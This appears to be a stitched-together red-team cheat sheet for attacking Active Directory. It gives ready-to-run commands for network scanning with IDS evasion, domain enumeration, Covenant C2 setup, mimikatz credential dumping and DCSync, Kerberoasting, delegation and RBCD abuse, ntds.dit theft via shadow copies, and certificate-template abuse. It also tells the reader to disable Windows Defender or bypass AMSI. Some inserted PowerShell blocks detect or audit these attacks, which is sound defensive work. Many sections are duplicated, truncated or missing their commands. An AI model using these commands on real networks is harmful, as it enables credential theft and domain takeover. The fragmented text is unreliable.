Active Directory-1
PUBLIC SCHOOL
Active Directory
Reconnaissance
Ping Sweep
nmap -sP 192.168.1.0/24 -oN scan-alive-hosts.txt
nmap -sP 192.168.1.1,5,100,150 -oN scan-alive-hosts.txt
UDP Scan:
nmap -sU --top-ports 100 -oN nmap-udp-initial.txt 192.168.1.1
Scan Multiple Targets
nmap [target1] [target2] ...
Scan a List of Targets
nmap -iL [list.txt]
Scan an Entire Subnet
nmap [ip address/cidr]
Scan Random Hosts
nmap -iR [number]
-Pn No ping (skip host discovery, treat every target as up)
Create a Host List
nmap -sL [targets]
Port Specification and Scan Order
Service/Version Detection
Script Scan
OS Detection
Firewall Evasion Techniques
Firewall/IDS Evasion and Spoofing
Fragment Packets
nmap -f [target]
Use a Decoy
nmap -D RND:[number] [target]
UDP Scan
nmap -sU [target]
Xmas Scan
nmap -sX [target]
TCP ACK Scan
nmap -sA [target]
IP Protocol Scan
nmap -sO [target]
Send Raw Ethernet Packets
nmap --send-eth [target]
Send IP Packets
nmap --send-ip [target]
Timing Options
Timing Templates
nmap -T[0-5] [target]
Set the Packet TTL
nmap --ttl [time] [target]
Minimum Number of Parallel Operations
nmap --min-parallelism [number] [target]
Maximum Number of Parallel Operations
nmap --max-parallelism [number] [target]
Minimum Host Group Size
nmap --min-hostgroup [number] [targets]
Maximum Host Group Size
nmap --max-hostgroup [number] [targets]
Initial RTT Timeout
nmap --initial-rtt-timeout [time] [target]
Maximum RTT Timeout
nmap --max-rtt-timeout [time] [target]
Maximum Number of Retries
nmap --max-retries [number] [target]
Host Timeout
nmap --host-timeout [time] [target]
Minimum Scan Delay
nmap --scan-delay [time] [target]
Maximum Scan Delay
nmap --max-scan-delay [time] [target]
Minimum Packet Rate
nmap --min-rate [number] [target]
Maximum Packet Rate
nmap --max-rate [number] [target]
Defeat Reset Rate Limits
nmap --defeat-rst-ratelimit [target]
Shellshock
nmap <ip> -p 80,443 --script=http-shellshock --script-args uri=/cgi-bin/xx.cgi
GitHub - mubix/shellshocker-pocs: Collection of Proof of Concepts and Potential Targets for #ShellShocker
Searchsploit
Find known exploits. Usage:
searchsploit <keyword>
To copy the exploit script:
searchsploit <EDB-ID> -m <Output_Location>
https://github.com/outflanknl/Recon-AD
Using BloodHound
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
• # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
• Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
• Invoke-BloodHound -CollectionMethod All -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>
• # or remotely via BloodHound Python
• # https://github.com/fox-it/BloodHound.py
• pip install bloodhound
• bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
• Collect more data for certificates exploitation using Certipy
• certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound
• certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound
• certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123
Then import the zip/json files into the Neo4J database and query them.
root@payload$ apt install bloodhound
# start BloodHound and the database
root@payload$ neo4j console
# or use docker
root@payload$ docker run -p7474:7474 -p7687:7687 -e NEO4J_AUTH=neo4j/bloodhound neo4j
root@payload$ ./bloodhound --no-sandbox
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4j, pass:neo4j
You can add some custom queries like :
• Bloodhound-Custom-Queries from @hausec
Using PowerView
• #Will show us the policy configurations of the Domain about system access or kerberos
• (Get-DomainPolicy)."system access"
• (Get-DomainPolicy)."kerberos policy"
• Get Domain Controllers:
• Get-NetDomainController
• Get-NetDomainController -Domain <DomainName>
• Enumerate Domain Users:
• Get-NetUser
• Get-NetUser -SamAccountName <user>
• Get-NetUser | select cn
• Get-UserProperty
• #Enumerate Session Information for a machine
• Get-NetSession -ComputerName <ComputerName>
• #Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
• Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
• Enumerate Shares
• #Enumerate Domain Shares
• Find-DomainShare
• #Enumerate Domain Shares the current user has access to
• Find-DomainShare -CheckShareAccess
• Enum Group Policies:
• Get-NetGPO
• #Shows active Policy on specified machine
• Get-NetGPO -ComputerName <Name of the PC>
• Get-NetGPOGroup
• #Get users that are part of a Machine's local Admin group
• Find-GPOComputerAdmin -ComputerName <ComputerName>
• Enum OUs:
• Get-NetOU -FullData
• Get-NetGPO -GPOname <The GUID of the GPO>
• Enum ACLs:
• #Returns the ACLs associated with the specified account
• Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs
• Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
Search for interesting ACEs
• Invoke-ACLScanner -ResolveGUIDs
• #Check the ACLs associated with a specified path (e.g. smb share)
• Get-PathAcl -Path "\\Path\Of\A\Share"
• Enum Domain Trust:
• Get-NetDomainTrust
• Get-NetDomainTrust -Domain <DomainName>
• Enum Forest Trust:
• Get-NetForestDomain
• Get-NetForestDomain -Forest <ForestName>
• #Domains of Forest Enumeration
• Get-NetForestDomain
• Get-NetForestDomain -Forest <ForestName>
• #Map the Trust of the Forest
• Get-NetForestTrust
• Get-NetForestTrust -Forest <ForestName>
• User Hunting:
• #Finds all machines on the current domain where the current user has local admin access
• Find-LocalAdminAccess -Verbose
• #Find local admins on all machines of the domain:
• Invoke-EnumerateLocalAdmin -Verbose
• #Find computers where a Domain Admin OR a specified user has a session
• Invoke-UserHunter
• Invoke-UserHunter -GroupName "RDPUsers"
• Invoke-UserHunter -Stealth
• #Confirming admin access:
• Invoke-UserHunter -CheckAccess
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
Using AD Module
• Get-ADDomainController
Get-ADDomainController -Identity <DomainName>
• Enumerate Domain Users:
• Get-ADUser -Filter * -Properties *
• Get-ADUser -Identity <user> -Properties *
• #Get a specific "string" in a user's attribute
• Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
• Enum Domain Computers:
• Get-ADComputer -Filter * -Properties *
• Get-ADGroup -Filter *
• Enum Domain Trust:
• Get-ADTrust -Filter *
• Get-ADTrust -Identity <DomainName>
• Enum Forest Trust:
• Get-ADForest
• Get-ADForest -Identity <ForestName>
• #Domains of Forest Enumeration
• (Get-ADForest).Domains
• Enum Local AppLocker Effective Policy:
• Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Other Interesting Commands
• Find Domain Controllers
• nslookup domain.com
• nslookup -type=srv _ldap._tcp.dc._msdcs.<domain>.com
• nltest /dclist:domain.com
• Get-ADDomainController -filter * | Select-Object name
• gpresult /r
• $Env:LOGONSERVER
• echo %LOGONSERVER%
Initial Access
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office
https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean
https://www.ired.team/offensive-security/code-execution
The Hitchhiker's Guide To Initial Access
How To: Empire’s Cross Platform Office Macro Phishing with PowerPoint
Bash Bunny
USB Drop Attacks: The Danger of “Lost And Found” Thumb Drives
Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter - Defcon 24
Cobalt Strike - Spear Phishing documentation
Cobalt Strike Blog - What's the go-to phishing technique or exploit? Spear phishing with Cobalt Strike - Raphael Mudge
POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE MACRO AND EVADING AVS
Macroless DOC malware that avoids detection with Yara rule
Phishing between the app whitelists
Executing Metasploit & Empire Payloads from MS Office Document Properties (part 1 of 2)
Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2)
Social Engineer Portal
Using Social Engineering Tactics For Big Data Espionage - RSA Conference Europe 2012
https://0x1.gitlab.io/pentesting/Red-Teaming-Toolkit/
Covenant C2 Setup
https://captainroot.com/blog/getting-started-with-covenant-c2-in-kali-linux/
https://michaelkoczwara.medium.com/covenant-c2-quick-setup-on-windows-296a0d400de2
..but I hope to summarise what's needed to get it up and running on Kali Linux in this post.
First, you need to download the .NET Core framework for Linux. At the time of writing the latest version was 3.1. You can find the latest *recommended* release over here:
Official .NET Core downloads for Linux, macOS, and Windows. .NET Core is a cross-platform version of .NET, for building… (dotnet.microsoft.com)
I have a 64bit Kali linux. I've read some recommendations mentioning to use 64bit instead of 32bit Kali when installing Covenant. I downloaded the 64bit version of the .NET SDK package from the .NET Core 3.1 download page. Screenshot below
Once the tar.gz file is downloaded on to my Kali host, I pretty much followed the instructions from here to extract it and set the relevant environment variables. I've detailed the steps I took below for clarity.
The above command will extract the contents to your $HOME/dotnet folder as confirmed below:
Now set the environment variables required with the following commands:
export DOTNET_ROOT=$HOME/dotnet
export PATH=$PATH:$HOME/dotnet
And you are done setting up the .NET Core framework needed for Covenant. Now, let's move on to installing Covenant itself.
I installed Covenant under my ~/tools folder, so feel free to change the location as you need:
I installed Covenant under my ~/tools folder, so feel free to change the location as you need:
cd Covenant/Covenant
dotnet build
Running the above command will start building the Covenant project. If it built successfully, you should get a message like this:
# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:7443            0.0.0.0:*               LISTEN      1650543/Covenant
Now, open up a web browser and point to port 7443 of your Kali host. For example, if your Kali host IP is 192.168.1.10 you should be trying https://192.168.1.10:7443, as an example.
You will get a certificate warning, which you can safely ignore for now and proceed, which will redirect you to the /covenantuser/login path. If everything has gone well so far, this should take you to the Covenant initial user registration page as shown below:
Provide a username and password to register an account. Make sure you remember this password or save it securely somewhere.
Once logged in, you will be taken to the /home/index path where the Covenant dashboard will be displayed to you as shown below:
https://dian-pentest.medium.com/install-covenant-on-kali-linux-c0350804648d
Covenant Attack – AD
https://www.youtube.com/watch?v=6C8tzKb3kEQ
https://infosecwriteups.com/hack-the-box-sauna-write-up-w-covenant-c2-c2d71141c90b
Creating Listener
Before we can use Covenant for red teaming activity, the first thing we need to set up is a Listener. Basically a Covenant Listener is the same as the usual listener we have used like netcat or meterpreter. In Covenant, a stager is called a Grunt. We will talk about it in the next section below. First of all, create the listener at the listener menu.
Name: Identifier name for the listener, default is a generated value but you can set it as you like
ConnectAddress & ConnectPort: Address and port that will be used as connect back for the stager.
After we create the listener, it will show in the listeners list. For example, I create a listener with name First-Listener and type HTTP.
Listener
Start the listener we've created before and it will show you the new information in the listener like the figure below
Start Listener
We can double-check to make sure the listener is successfully active using this command in the terminal:
Launcher
Launchers are an all-in-one payload delivery feature that generate, host, and download binaries/scripts to launch new Grunts
Covenant Launcher
Here is the explanation from the Covenant wiki:
Binary — The Binary launcher is used to generate custom binaries that launch a Grunt. This is currently the only launcher that does not rely on a system binary.
MSBuild — The MSBuild launcher is used to generate an MSBuild XML file that launches a Grunt using msbuild.exe.
InstallUtil — The InstallUtil launcher is used to generate an InstallUtil XML file that launches a Grunt using installutil.exe.
Mshta — The Mshta launcher is used to generate an HTA file and/or a mshta one-liner that launches a Grunt using mshta.exe that relies on DotNetToJScript.
Regsvr32 — The Regsvr32 launcher is used to generate an SCT file and/or regsvr32 one-liner that launches a Grunt using regsvr32.exe that relies on DotNetToJScript.
Wmic — The Wmic launcher is used to generate an xsl file and/or wmic one-liner that launches a Grunt using wmic.exe that relies on DotNetToJScript.
Cscript — The Cscript launcher is used to generate a JScript file that launches a Grunt using cscript.exe that relies on DotNetToJScript.
Wscript — The Wscript launcher is used to generate a JScript file that launches a Grunt using wscript.exe that relies on DotNetToJScript.
For this article, I will use the PowerShell Launcher as the example. Don't forget to disable Windows Defender or bypass AMSI first (it will be discussed later).
Creating Launcher
Create PowerShellLauncher
Choose and customize with your own environment. I suggest that you choose GruntHTTP for the implant template. After that, click generate and it will generate a launcher and an encoded launcher for our need.
Generated launcher
Testing Launcher
We need to test our launcher in our Windows box to see how the payload and communication work. Open command prompt and paste the generated launcher.
Powershell launcher
As we can see from the above picture, our launcher has successfully connected to the listener as a grunt. This is what it looks like in grunts
Grunt information
We can interact with the victim machine using covenant interact feature in grunt
Grunt interaction
Covenant also support GUI file browser
Grunt file browser
I think that's all for the getting started article about Covenant C2. We will talk about more Covenant features in the next article.
If you like this article, please share it and feedback is always welcome.
Reference:
https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462
https://petruknisme.medium.com/getting-started-with-covenant-c2-for-red-teaming-8eeb94273b52
https://github.com/active-labs/ACTIVEBlog/blob/master/Red%20Team%20Infrastructure%20-%20C2/Red%20Team%20Infrastructure%20-%20C2.md
Local Privilege Escalation
Windows Privilege Escalation CheatSheet
Cheat Sheet for Windows Local Privilege Escalations
Juicy Potato
Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation
Works only until Windows Server 2016 and Windows 10 until patch 1803
Lateral Movement
PowerShell Remoting
#Enable PowerShell Remoting on current Machine (Needs Admin Access)
Enable-PSRemoting
#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords
mimikatz sekurlsa::tspkg
mimikatz sekurlsa::ekeys
#Dump SECRETS Database
mimikatz lsadump::secrets
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject
#Dump the Domain's Credentials without touching DC's LSASS and also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all
❗ What if mimikatz fails to dump credentials because of LSA Protection controls?
#Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
#Next upload the mimidriver.sys from the official mimikatz repo to the same folder as your mimikatz.exe
mimikatz # !+
#Finally run the logonpasswords function to dump lsass
mimikatz # sekurlsa::logonpasswords
o PPLdump
#If it does there isn't a way to dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
#Let's inject our own malicious Security Support Provider into memory, for this example I'll use the one mimikatz provides
mimikatz # misc::memssp
#Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
POWERSHELL REMOTING
exit
# PUSH LOCAL SCRIPT TO SESSION
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession $sess
# DUMPING
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
FORWARDER
# RULE
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=10.10.10.10 connectport=8080
# CHECK
A command you run on ServerB via your PowerShell Remoting session attempts to access a resource on ServerC.
◆ Access to the resource on ServerC is denied, because the credentials you used to create the PowerShell Remoting session are not passed from ServerB to ServerC.
◆ Cannot encapsulate multiple psremoting sessions.
◆ Delegation not available.
# PSREMOTE TO SERVER A
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\alice', $SecPassword)
# CHECK INJECTION:
# RCE ON SERVER C:
Domain Privilege Escalation 1
Kerberoast
WUT IS DIS?:
All standard domain users can request a copy of all service accounts along with their correlating password hashes, so we can ask a TGS for any SPN that is bound to a "user" account, extract the encrypted blob that was encrypted using the user's password and bruteforce it offline.
PowerView:
Get-NetUser -SPN
#Get every available SPN account, request a TGS and dump its hash
Invoke-Kerberoast
Request-SPNTicket
AD Module:
Impacket:
python GetUserSPNs.py <DomainName>/<DomainUser>:<Password> -outputfile <FileName>
Rubeus:
#Kerberoasting while being "OPSEC" safe, essentially while not trying to roast AES enabled accounts
#Kerberoast by specifying the authentication credentials
Hint: We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable!
PowerView:
Invoke-ASREPRoast -Verbose
Using Rubeus:
Rubeus.exe asreproast /ou:<OUName> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
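From the defender's side, the two properties the roasting tools above rely on (RC4-encrypted TGS requests for user-account SPNs, and TGTs issued with pre-authentication type 0) are exactly what a detection keys on. The following PowerShell is an added example, not part of the cheat sheet or of Rubeus/Impacket; it runs over constructed 4768/4769 records so it can be tried offline, and the hashtable field names mirror the EventData names of those two events.

```powershell
# Added example (not from the cheat sheet or the tools it lists): flag Kerberoast
# and AS-REP roast indicators in Domain Controller security events.
# Field names follow the 4768/4769 event schema; the sample records are constructed.

function Test-RoastingIndicator {
    param(
        [Parameter(Mandatory)] [hashtable] $Event,
        # TGS requests for these services are routine and are ignored
        [string[]] $AllowedServices = @('krbtgt')
    )
    switch ($Event.Id) {
        4769 {
            $svc = $Event.ServiceName
            # Machine-account SPNs (name ends in '$') have long random passwords and are
            # not crackable; the interesting case is a *user* account SPN requested with
            # RC4 (TicketEncryptionType 0x17) instead of AES (0x11/0x12).
            if ($svc -like '*$' -or $AllowedServices -contains $svc) { return }
            if ($Event.TicketEncryptionType -eq '0x17') {
                [pscustomobject]@{
                    Indicator = 'Kerberoast'
                    Account   = $Event.TargetUserName
                    Service   = $svc
                    Source    = $Event.IpAddress
                    Detail    = 'RC4 TGS for a user-account SPN'
                }
            }
        }
        4768 {
            # PreAuthType 0 means the TGT was issued without pre-authentication,
            # which is exactly what AS-REP roasting relies on (DONT_REQ_PREAUTH set)
            if ($Event.PreAuthType -eq '0' -and $Event.TargetUserName -notlike '*$') {
                [pscustomobject]@{
                    Indicator = 'ASREPRoast'
                    Account   = $Event.TargetUserName
                    Service   = 'krbtgt'
                    Source    = $Event.IpAddress
                    Detail    = 'TGT issued without pre-authentication'
                }
            }
        }
    }
}

function Get-RoastingReport {
    param([hashtable[]] $Events, [int] $Threshold = 5)
    $hits = @($Events | ForEach-Object { Test-RoastingIndicator -Event $_ })
    # Roasting tools request many tickets in a burst: group by requester IP and count
    $hits | Group-Object Indicator, Source | ForEach-Object {
        [pscustomobject]@{
            Indicator = $_.Group[0].Indicator
            Source    = $_.Group[0].Source
            Requests  = $_.Count
            Services  = (@($_.Group.Service) | Sort-Object -Unique) -join ','
            Burst     = $_.Count -ge $Threshold
        }
    }
}

# Constructed sample events (not real log data). On a live DC the same fields come
# from Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4768,4769} and the
# event's XML <EventData> values.
$sample = @(
    @{ Id = 4769; TargetUserName = 'alice@CORP.LOCAL'; ServiceName = 'svc_sql'; TicketEncryptionType = '0x17'; IpAddress = '10.0.0.50' },
    @{ Id = 4769; TargetUserName = 'alice@CORP.LOCAL'; ServiceName = 'svc_web'; TicketEncryptionType = '0x17'; IpAddress = '10.0.0.50' },
    @{ Id = 4769; TargetUserName = 'alice@CORP.LOCAL'; ServiceName = 'WS01$';   TicketEncryptionType = '0x17'; IpAddress = '10.0.0.50' },
    @{ Id = 4769; TargetUserName = 'bob@CORP.LOCAL';   ServiceName = 'svc_sql'; TicketEncryptionType = '0x12'; IpAddress = '10.0.0.51' },
    @{ Id = 4768; TargetUserName = 'legacyuser';       ServiceName = 'krbtgt';  PreAuthType = '0';             IpAddress = '10.0.0.52' }
)
Get-RoastingReport -Events $sample -Threshold 2 | Format-Table -AutoSize
```

With the constructed sample the report shows one Kerberoast burst from 10.0.0.50 (two user SPNs, the machine-account request ignored), one AS-REP entry from 10.0.0.52, and nothing for the AES request from 10.0.0.51.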
Using Impacket:
Tools:
DomainPasswordSpray
CrackMapExec
Invoke-CleverSpray
Spray
PowerView:
AD Module:
#Force set the SPN on the account:
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Domain Escalation.
1. You can dump the backed-up SAM database and harvest credentials.
2. Look for DPAPI stored creds and decrypt them.
3. Access backed-up sensitive files.
%appdata%\Microsoft\Credentials
%localappdata%\Microsoft\Credentials
#By using the cred function of mimikatz we can enumerate the cred object and get information about it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
#From the previous command we are interested in the "guidMasterKey" parameter, that tells us which masterkey was used to encrypt the credential
#Now if we are in the context of the user (or system) that the credential belongs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controller:
WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a high value target or DA to connect to it, steal his TGT then ptt and impersonate him!
Using PowerView:
Get-NetComputer -Unconstrained
#List tickets and check if a DA or some High Value target has stored its TGT
Constrained Delegation
Using PowerView and Kekeo:
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo
#Then using the TGT we have, ask for a TGS for a Service this user has Access to through constrained delegation
What if we have delegation rights for only a specific SPN? (e.g. TIME):
In this case we can still abuse a feature of kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services and not only for the one we have rights for. That gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.
Tools we are going to use:
PowerView
Powermad
Rubeus
First we need to enter the security context of the user/machine account that has the privileges over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
Exploitation Example:
#Import Powermad and use it to create a new MACHINE ACCOUNT
. .\Powermad.ps1
New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid
#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
#After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'p@ssword!'
#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
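An added defensive counterpart to the unconstrained, constrained and resource-based delegation sections above (not the cheat sheet's or PowerView's code): a read-only inventory of all three configurations using the RSAT ActiveDirectory module, which is assumed to be installed on a domain-joined host with read access to the domain.

```powershell
# Added example (not the cheat sheet's own code): inventory the three Kerberos
# delegation configurations the sections above abuse, so each entry can be
# reviewed. Assumes the RSAT ActiveDirectory module and read access to the domain.
Import-Module ActiveDirectory

function Get-DelegationReport {
    param([string] $Server)           # optional DC to query
    $common = @{}
    if ($Server) { $common.Server = $Server }

    # 1. Unconstrained delegation: TRUSTED_FOR_DELEGATION (0x80000) in userAccountControl.
    #    Domain controllers carry it by design, so they are labelled rather than hidden.
    $dcs = @((Get-ADDomainController -Filter * @common).ComputerObjectDN)
    Get-ADObject -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)' `
        -Properties sAMAccountName @common | ForEach-Object {
        $note = if ($dcs -contains $_.DistinguishedName) { 'domain controller (expected)' } else { 'REVIEW' }
        [pscustomobject]@{ Type = 'Unconstrained'; Account = $_.sAMAccountName; Target = '*'; Note = $note }
    }

    # 2. Constrained delegation: msDS-AllowedToDelegateTo lists the target SPNs.
    #    TRUSTED_TO_AUTH_FOR_DELEGATION (0x1000000) additionally allows protocol transition,
    #    i.e. the account can impersonate users who never authenticated to it.
    Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
        -Properties sAMAccountName, msDS-AllowedToDelegateTo, userAccountControl @common | ForEach-Object {
        $pt   = ([int]$_.userAccountControl -band 0x1000000) -ne 0
        $note = if ($pt) { 'protocol transition enabled: REVIEW' } else { 'Kerberos-only' }
        [pscustomobject]@{
            Type    = 'Constrained'
            Account = $_.sAMAccountName
            Target  = (@($_.'msDS-AllowedToDelegateTo') -join '; ')
            Note    = $note
        }
    }

    # 3. Resource-based constrained delegation: the *target* object stores a security
    #    descriptor naming who may act on behalf of other users (this is what the
    #    Powermad/PowerView/Rubeus example above writes). Resolve its SIDs to names.
    Get-ADObject -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
        -Properties sAMAccountName, msDS-AllowedToActOnBehalfOfOtherIdentity @common | ForEach-Object {
        $sd  = $_.'msDS-AllowedToActOnBehalfOfOtherIdentity'
        $who = foreach ($ace in $sd.Access) {
            try { $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $ace.IdentityReference.Value }
        }
        [pscustomobject]@{
            Type    = 'RBCD'
            Account = (@($who) -join '; ')
            Target  = $_.sAMAccountName
            Note    = 'REVIEW: a recently created machine account here is a classic sign of abuse'
        }
    }
}

Get-DelegationReport | Format-Table -AutoSize
```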
WUT IS DIS ?: If we manage to compromise a user account that is member of the Backup Operators group, we can then abuse its SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our privileges to DA.
1. Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
#Create a .txt file that will contain the shadow copy process script
Script ->{
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
}
#Execute diskshadow with our script as parameter
diskshadow /s script.txt
2. Next we need to access the shadow copy, we may have the SeBackupPrivilege but we can't just simply copy-paste ntds.dit, we need to mimic a backup software and use Win32 API calls to copy it on an accessible folder. For this we are going to
Get-SeBackupPrivilege
Set-SeBackupPrivilege
#Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
Abusing Exchange
CVE-2020-0688
PrivExchange Exchange your privileges for Domain Admin privs by abusing Exchange
NetNTLMtoSilverTicket
Abusing ACLs
aclpwn.py
Invoke-ACLPwn
mitm6
Exploitation example:
Format: RootDomainSID-519
#List the DC of the Root Domain
dir \\dc.root.domain.local\C$
Zerologon
PrintNightmare
Note: Certify can be executed with Cobalt Strike's execute-assembly command as well
.\Certify.exe find /vulnerable /quiet
Make sure the msPKI-Certificate-Name-Flag value is set to "ENROLLEE_SUPPLIES_SUBJECT" and that the Enrollment Rights allow Domain/Authenticated Users. Additionally, check that the pkiextendedkeyusage parameter contains the "Client Authentication" value as well as that the "Authorized Signatures Required" parameter is set to 0.
This exploit only works because these settings enable server/client authentication, meaning an attacker can specify the UPN of a Domain Admin ("DA") and use the captured certificate with Rubeus to forge authentication.
Note: If a Domain Admin is in the Protected Users group, the exploit may not work as intended. Check before choosing a DA to target.
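The four template conditions just listed can be audited directly rather than with Certify. The following read-only PowerShell is an added example (not from the text, Certify or Certipy) and assumes the RSAT ActiveDirectory module; it reads the Configuration partition and reports every template that meets all four at once.

```powershell
# Added example (not from the text or from Certify/Certipy): audit every AD CS
# certificate template for the four ESC1 conditions listed above, read-only.
# Assumes the RSAT ActiveDirectory module; the container path, attribute names,
# flag bit, EKU OIDs and rights GUID are the documented AD CS values.
Import-Module ActiveDirectory

function Get-Esc1TemplateReport {
    $cfg       = (Get-ADRootDSE).configurationNamingContext
    $container = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$cfg"

    $EnrolleeSuppliesSubject = 0x1                             # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    $ClientAuthEku = @('1.3.6.1.5.5.7.3.2',                    # Client Authentication
                       '1.3.6.1.5.2.3.4',                      # PKINIT Client Authentication
                       '1.3.6.1.4.1.311.20.2.2',               # Smart Card Logon
                       '2.5.29.37.0')                          # Any Purpose
    $EnrollGuid = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55' # Certificate-Enrollment right
    $AllGuid    = [guid]::Empty                                # ACE covering all extended rights
    # Principals broad enough that granting them Enroll exposes the whole domain
    $domainSid = (Get-ADDomain).DomainSID.Value
    $BroadSids = @('S-1-5-11', 'S-1-1-0', "$domainSid-513")    # Authenticated Users, Everyone, Domain Users
    $ExtRight  = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $AllRights = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll

    Get-ADObject -SearchBase $container -LDAPFilter '(objectClass=pKICertificateTemplate)' `
        -Properties msPKI-Certificate-Name-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage, nTSecurityDescriptor |
    ForEach-Object {
        $t    = $_
        $ekus = @($t.pKIExtendedKeyUsage | Where-Object { $_ })

        $suppliesSubject = ([int]$t.'msPKI-Certificate-Name-Flag' -band $EnrolleeSuppliesSubject) -ne 0
        # No EKU at all means the certificate is valid for any purpose, client auth included
        $clientAuth = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $ClientAuthEku -contains $_ }).Count -gt 0)
        $noApproval = ([int]$t.'msPKI-RA-Signature') -eq 0

        # Which broad principals hold Enroll (or GenericAll) on this template?
        $broadEnroll = foreach ($ace in $t.nTSecurityDescriptor.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { continue }
            if ($BroadSids -notcontains $sid) { continue }
            $rights   = $ace.ActiveDirectoryRights
            $isEnroll = (($rights -band $ExtRight) -ne 0) -and ($ace.ObjectType -eq $EnrollGuid -or $ace.ObjectType -eq $AllGuid)
            $isAll    = (($rights -band $AllRights) -eq $AllRights)
            if ($isEnroll -or $isAll) { $ace.IdentityReference.Value }
        }
        $broadEnroll = @($broadEnroll)

        [pscustomobject]@{
            Template         = $t.Name
            SuppliesSubject  = $suppliesSubject
            ClientAuthEku    = $clientAuth
            NoApprovalNeeded = $noApproval
            BroadEnroll      = ($broadEnroll -join '; ')
            ESC1             = $suppliesSubject -and $clientAuth -and $noApproval -and ($broadEnroll.Count -gt 0)
        }
    }
}

Get-Esc1TemplateReport | Where-Object ESC1 | Format-Table -AutoSize
```

Drop the `Where-Object ESC1` filter to see the per-condition columns for every template, which is useful when a template fails only one of the four checks.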
Example of cert.pem:
-----BEGIN RSA PRIVATE KEY-----
BIIEogIBAAk15x0ID[...]
[...]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
BIIEogIBOmgAwIbSe[...]
[...]
-----END CERTIFICATE-----
#Utilize openssl to Convert to PKCS #12 Format
The openssl command can be utilized to convert the certificate file into PKCS #12 format (you may be required to enter an export password, which can be anything you like).
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
